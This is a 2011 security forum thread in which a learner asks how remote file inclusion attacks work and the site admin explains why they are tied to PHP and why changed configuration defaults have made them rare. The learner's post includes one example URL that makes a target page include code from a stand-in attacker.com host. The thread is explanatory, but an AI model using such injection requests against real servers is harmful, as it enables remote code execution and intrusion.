 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 55
 Members: 0
 Total: 55
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Some questions on Remote file inclusion attacks? |
|
 Posted: Fri Sep 02, 2011 4:45 am |
 |
|
| manoj9372 |
| Regular user |
 |
|
| Joined: Aug 13, 2010 |
| Posts: 16 |
|
|
|
 |
|
 |
|
Hi guys,
i have been started to learn/read about RFI attacks and i have readed some books,documents and some tutorials regarding this.
At the i have been ended up with some questions,i tought it would be good to ask here
here are my questions:
1)does RFI attacks only works with the php language?
2)dont this attack work on other server side scripting languages such as jsp,asp and other server side scripting languages?
3)if yes why?
4)is this the one and only form of RFI injection?
| Code: |
http://www.target.com/vuln_page.php?file=http://attacker.com/malicious
|
5)Also what types of files can be injected in the space "malicious"
is this only limited to php and txt files ?
6)why this class of vulnerability is dying very fast ?,because when i checked in sites like 1337day and exploit-db for these kind of bugs
i had seen that last RFI has been posted before 3-4 months,so it seems this breed of bug is dying fast.
Looking for some answers.. |
|
|
|
|
|
|
|
|
| Posted: Sun Sep 04, 2011 6:14 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
RFI is usually associated with PHP because it contains functions,
that can retrieve remote file and evaluate its content as php code.
I'm not aware of similar exploitability in other programming languages.
Now, why is RFI dying. Well, at least two reasons:
1. "allow_url_include" php confinguration setting, avaliable from
version 5.2.0 and "off" by default.
http://php.net/manual/en/filesystem.configuration.php
2. "register_globals" off-the-box default value changed:
http://php.net/manual/en/security.globals.php
"Perhaps the most controversial change in PHP is when the default
value for the PHP directive register_globals went from ON to OFF
in PHP > 4.2.0"
Right now, in year 2011 most real world php servers have indeed
"allow_url_include=0" and "register_globals=0", so variable tampering
as favourite RFI method does not work and even if you can get thru this,
then you get error message
"Warning: include() [function.include]: URL file-access is disabled in the server configuration".
And by the way - don't limit yourself with RFI only. Think out of the box.
There can be various ways to get remote server running your code. It all
depends on specific target. Good hacker or pentester knows as many as possible
ways to exploit things and RFI is just small subset of possibilities! |
|
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
